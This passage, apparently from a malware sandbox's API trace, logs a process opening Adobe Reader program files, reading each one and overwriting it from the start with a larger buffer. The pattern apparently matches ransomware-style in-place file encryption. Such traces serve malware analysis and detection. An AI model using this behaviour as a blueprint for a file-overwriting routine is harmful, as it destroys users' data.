nNumberOfBytesToWrite=0xf88, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesWritten=0x331f2d0*=0xf88, lpOverlapped=0x0) returned 1 [0095.580] CloseHandle (hObject=0x1cc) returned 1 [0095.580] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_SKY\\WindowsMedia.SKY" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp_sky\\windowsmedia.sky"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0095.580] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0095.581] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0xa00 [0095.581] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0095.581] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0095.581] ReleaseMutex (hMutex=0x168) returned 1 [0095.581] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WindowsMedia.SKY", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0095.581] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WindowsMedia.SKY", cchWideChar=16, lpMultiByteStr=0x1f88b2c, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WindowsMedia.SKY", lpUsedDefaultChar=0x0) returned 16 [0095.581] ReadFile (in: hFile=0x1cc, lpBuffer=0x1eace08, nNumberOfBytesToRead=0xa00, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1eace08*, lpNumberOfBytesRead=0x331f2bc*=0xa00, lpOverlapped=0x0) returned 1 [0095.583] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0095.583] WriteFile (in: hFile=0x1cc, lpBuffer=0x1e90018*, nNumberOfBytesToWrite=0xf88, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesWritten=0x331f2d0*=0xf88, lpOverlapped=0x0) returned 1 [0095.583] CloseHandle (hObject=0x1cc) returned 1 [0095.583] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_TUR\\WindowsMedia.TUR" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp_tur\\windowsmedia.tur"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0095.584] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0095.584] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0xa00 [0095.584] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0095.584] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0095.584] ReleaseMutex (hMutex=0x168) returned 1 [0095.585] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WindowsMedia.TUR", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0095.585] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WindowsMedia.TUR", cchWideChar=16, lpMultiByteStr=0x1f88b2c, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WindowsMedia.TUR", lpUsedDefaultChar=0x0) returned 16 [0095.585] ReadFile (in: hFile=0x1cc, lpBuffer=0x1eace08, nNumberOfBytesToRead=0xa00, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1eace08*, lpNumberOfBytesRead=0x331f2bc*=0xa00, lpOverlapped=0x0) returned 1 [0095.587] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0095.587] WriteFile (in: hFile=0x1cc, lpBuffer=0x2867a58*, nNumberOfBytesToWrite=0xf88, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesWritten=0x331f2d0*=0xf88, lpOverlapped=0x0) returned 1 [0095.587] CloseHandle (hObject=0x1cc) returned 1 [0095.587] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\ReadOutLoud.api" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\readoutloud.api"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0095.588] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0095.589] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x1b663 [0095.589] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0095.589] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0095.589] ReleaseMutex (hMutex=0x168) returned 1 [0095.589] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ReadOutLoud.api", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0095.589] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ReadOutLoud.api", cchWideChar=15, lpMultiByteStr=0x1f7356c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ReadOutLoud.api", lpUsedDefaultChar=0x0) returned 15 [0095.589] ReadFile (in: hFile=0x1cc, lpBuffer=0x2870988, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x2870988*, lpNumberOfBytesRead=0x331f278*=0x4000, lpOverlapped=0x0) returned 1 [0096.301] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x1a663 [0096.301] ReadFile (in: hFile=0x1cc, lpBuffer=0x2867a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0096.302] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x1a663 [0096.302] WriteFile (in: hFile=0x1cc, lpBuffer=0x2870988*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x2870988*, lpNumberOfBytesWritten=0x331f28c*=0x1588, lpOverlapped=0x0) returned 1 [0096.303] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f2bc*=0) returned 0x0 [0096.303] WriteFile (in: hFile=0x1cc, lpBuffer=0x2870988*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x2870988*, lpNumberOfBytesWritten=0x331f28c*=0x4000, lpOverlapped=0x0) returned 1 [0096.303] CloseHandle (hObject=0x1cc) returned 1 [0096.303] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins3d\\2d.x3d" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins3d\\2d.x3d"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0096.366] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0096.366] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x86988 [0096.366] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0096.366] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0096.367] ReleaseMutex (hMutex=0x168) returned 1 [0096.367] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="2d.x3d", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0096.367] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="2d.x3d", cchWideChar=6, lpMultiByteStr=0x1f7ac24, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="2d.x3d", lpUsedDefaultChar=0x0) returned 6 [0096.367] ReadFile (in: hFile=0x1d8, lpBuffer=0x25a0018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x331f278*=0xf000, lpOverlapped=0x0) returned 1 [0096.380] ReadFile (in: hFile=0x1d8, lpBuffer=0x25a0018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0096.385] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x85988 [0096.385] ReadFile (in: hFile=0x1d8, lpBuffer=0x26956e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x26956e8*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0096.392] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x85988 [0096.393] WriteFile (in: hFile=0x1d8, lpBuffer=0x2865a58*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x2865a58*, lpNumberOfBytesWritten=0x331f28c*=0x1588, lpOverlapped=0x0) returned 1 [0096.393] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f2bc*=0) returned 0x0 [0096.393] WriteFile (in: hFile=0x1d8, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x331f28c*=0xf000, lpOverlapped=0x0) returned 1 [0096.394] WriteFile (in: hFile=0x1d8, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x331f28c*=0x1000, lpOverlapped=0x0) returned 1 [0096.394] CloseHandle (hObject=0x1d8) returned 1 [0096.394] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\pmd.cer" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\pmd.cer"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0096.395] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0096.395] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x1a4 [0096.395] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0096.395] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0096.395] ReleaseMutex (hMutex=0x168) returned 1 [0096.395] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="pmd.cer", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0096.395] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="pmd.cer", cchWideChar=7, lpMultiByteStr=0x1f7ac24, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="pmd.cer", lpUsedDefaultChar=0x0) returned 7 [0096.396] ReadFile (in: hFile=0x1d8, lpBuffer=0x25af228, nNumberOfBytesToRead=0x1a4, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x25af228*, lpNumberOfBytesRead=0x331f2bc*=0x1a4, lpOverlapped=0x0) returned 1 [0096.397] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0096.397] WriteFile (in: hFile=0x1d8, lpBuffer=0x1ea3978*, nNumberOfBytesToWrite=0x72c, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1ea3978*, lpNumberOfBytesWritten=0x331f2d0*=0x72c, lpOverlapped=0x0) returned 1 [0096.397] CloseHandle (hObject=0x1d8) returned 1 [0096.397] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\br.gif" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\tracker\\br.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0096.398] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0096.398] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x52 [0096.398] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0096.398] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0096.398] ReleaseMutex (hMutex=0x168) returned 1 [0096.398] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="br.gif", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0096.398] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="br.gif", cchWideChar=6, lpMultiByteStr=0x1f7ac24, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="br.gif", lpUsedDefaultChar=0x0) returned 6 [0096.398] ReadFile (in: hFile=0x1d8, lpBuffer=0x1f9f948, nNumberOfBytesToRead=0x52, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f9f948*, lpNumberOfBytesRead=0x331f2bc*=0x52, lpOverlapped=0x0) returned 1 [0096.399] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0096.399] WriteFile (in: hFile=0x1d8, lpBuffer=0x26cf048*, nNumberOfBytesToWrite=0x5da, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf048*, lpNumberOfBytesWritten=0x331f2d0*=0x5da, lpOverlapped=0x0) returned 1 [0096.400] CloseHandle (hObject=0x1d8) returned 1 [0096.400] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\forms_received.gif" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\tracker\\forms_received.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0096.400] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0096.400] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x267 [0096.400] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0096.401] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0096.401] ReleaseMutex (hMutex=0x168) returned 1 [0096.401] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="forms_received.gif", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0096.401] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="forms_received.gif", cchWideChar=18, lpMultiByteStr=0x1f88b2c, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="forms_received.gif", lpUsedDefaultChar=0x0) returned 18 [0096.401] ReadFile (in: hFile=0x1d8, lpBuffer=0x2695708, nNumberOfBytesToRead=0x267, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2695708*, lpNumberOfBytesRead=0x331f2bc*=0x267, lpOverlapped=0x0) returned 1 [0096.407] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0096.407] WriteFile (in: hFile=0x1d8, lpBuffer=0x1ea3978*, nNumberOfBytesToWrite=0x7ef, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1ea3978*, lpNumberOfBytesWritten=0x331f2d0*=0x7ef, lpOverlapped=0x0) returned 1 [0096.408] CloseHandle (hObject=0x1d8) returned 1 [0096.408] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\reviews_joined.gif" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\tracker\\reviews_joined.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0096.409] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0096.409] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x392 [0096.409] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0096.409] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0096.409] ReleaseMutex (hMutex=0x168) returned 1 [0096.409] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="reviews_joined.gif", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0096.409] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="reviews_joined.gif", cchWideChar=18, lpMultiByteStr=0x1f88b2c, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="reviews_joined.gif", lpUsedDefaultChar=0x0) returned 18 [0096.409] ReadFile (in: hFile=0x1d8, lpBuffer=0x1f4a978, nNumberOfBytesToRead=0x392, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f4a978*, lpNumberOfBytesRead=0x331f2bc*=0x392, lpOverlapped=0x0) returned 1 [0096.416] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0096.416] WriteFile (in: hFile=0x1d8, lpBuffer=0x1ea3978*, nNumberOfBytesToWrite=0x91a, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1ea3978*, lpNumberOfBytesWritten=0x331f2d0*=0x91a, lpOverlapped=0x0) returned 1 [0096.416] CloseHandle (hObject=0x1d8) returned 1 [0096.416] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\server_issue.gif" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\tracker\\server_issue.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0096.417] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0096.417] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x240 [0096.417] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0096.417] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0096.417] ReleaseMutex (hMutex=0x168) returned 1 [0096.417] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="server_issue.gif", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0096.417] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="server_issue.gif", cchWideChar=16, lpMultiByteStr=0x1f88b2c, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="server_issue.gif", lpUsedDefaultChar=0x0) returned 16 [0096.418] ReadFile (in: hFile=0x1d8, lpBuffer=0x1f64c78, nNumberOfBytesToRead=0x240, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f64c78*, lpNumberOfBytesRead=0x331f2bc*=0x240, lpOverlapped=0x0) returned 1 [0096.419] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0096.419] WriteFile (in: hFile=0x1d8, lpBuffer=0x1ea3978*, nNumberOfBytesToWrite=0x7c8, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1ea3978*, lpNumberOfBytesWritten=0x331f2d0*=0x7c8, lpOverlapped=0x0) returned 1 [0096.419] CloseHandle (hObject=0x1d8) returned 1 [0096.419] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\turnOffNotificationInAcrobat.gif" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\tracker\\turnoffnotificationinacrobat.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0096.420] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0096.420] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x338 [0096.420] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0096.420] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0096.420] ReleaseMutex (hMutex=0x168) returned 1 [0096.420] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="turnOffNotificationInAcrobat.gif", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0096.420] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="turnOffNotificationInAcrobat.gif", cchWideChar=32, lpMultiByteStr=0x1fa54dc, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="turnOffNotificationInAcrobat.gif", 